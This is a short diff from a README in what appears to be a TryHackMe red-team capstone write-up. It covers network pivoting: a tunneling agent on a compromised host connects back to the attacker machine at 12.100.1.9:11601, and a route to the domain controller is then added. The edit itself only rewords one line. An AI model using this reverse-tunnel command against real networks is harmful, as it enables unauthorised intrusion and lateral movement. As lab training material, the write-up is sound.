zinzloun/THM_WriteUP/RTM_Capstone/README.md

  	agent.exe -connect 12.100.1.9:11601 -ignore-cert

-You will get a new session on the attacker.
+You will get a new session on the attacker machine.
 You can interact with it using the session command.
 On the session command you can list all the agent network interfaces using ifconfig.
 Then add the routing information according to the interface you want to reach, in our case we add the route to the DC.
 <b>Do not route all the /24 subnet otherwise you will not be able to reach wrk1 and wrk2 anymore using corp VPN</b>